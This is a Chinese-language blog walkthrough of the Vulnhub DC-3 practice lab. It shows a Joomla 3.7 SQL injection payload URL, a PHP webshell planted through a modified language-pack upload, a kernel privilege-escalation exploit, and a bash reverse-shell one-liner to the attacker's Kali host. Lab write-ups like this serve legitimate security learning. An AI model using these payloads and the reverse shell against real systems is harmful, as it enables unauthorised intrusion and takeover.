r0ckyzzz's Blog.

Vulnhub靶机DC-3通关笔记

Word count: 514Reading time: 2 min
2020/03/08 Share

Vulnhub靶机DC-3通关笔记

前言

乘热打铁继续做

下载地址:https://www.vulnhub.com/entry/dc-3,312/

开始

扫描端口

upload successful
只有80端口开放
访问

upload successful
只有一个flag 一个入口点没有线索
目标是拿到root权限

用whatweb看看是用什么写的

upload successful

用的是Joomla!写的

用joomscan来扫描一下

https://github.com/rezasp/joomscan

upload successful

版本是3.7

去搜索一下3.7的漏洞找到一个sql注入漏洞

https://firedebug.github.io/PHP/Joomla3.7.0SQL注入/

http://192.168.123.6/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
用poc试一下果然存在这个漏洞 还是root权限

upload successful

在github找到个exp
https://github.com/stefanlucas/Exploit-Joomla

upload successful

得到admin的hash

cmd5解不出来??
卡壳了

后来看了wp才知道要用kali自带的字典rockyou来解 好吧。。

我Macbook的hashcat好像破解不了这个blowfish密码 硬件不支持

我直接拿了wp的密码登陆了

upload successful

upload successful

接下来就是后台getshell

具体步骤参考
https://klionsec.github.io/2017/05/18/joomla-3-70-exp-getshell/

简单来说就是下载官方的模版

http://joomlacode.org/gf/download/frsrelease/20033/163761/zh-CN_joomla_lang_full_3.4.1v2.zip
在模版中加入shell.php

然后在install.xml中加入shell.php

upload successful

打包上传

upload successful

接着访问shell.php
http://192.168.123.6/administrator/language/zh-CN/shell.php
导入蚁剑就好了

upload successful

是www-data权限现在的目标就是提权

upload successful

ubuntu16.04的系统
找一下有没有本地权限提升的exp

upload successful

找到一个符合的
Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ bpf(BPF_PROG_LOAD) Privilege Escalation

直接去下载exp

上传到/tmp目录
赋予执行权限

upload successful
之后
./compile.sh
./doubleput
得到root权限

upload successful

最终的flag

upload successful

少了一步就是在蚁剑终端反弹shell到kali

bash -c ‘bash -i >& /dev/tcp/192.168.123.4/5555 0>&1’

kali终端
nc -lvvp 5555

总结

这次的渗透还是比较轻松的 主要是在密码破解上卡壳了 拿到了加密的blowfish在cmd5找不到就没招了,没有想到还能用hashcat来破解

CATALOG
  1. 1. Vulnhub靶机DC-3通关笔记
    1. 1.1. ¶前言
    2. 1.2. ¶开始
    3. 1.3. ¶总结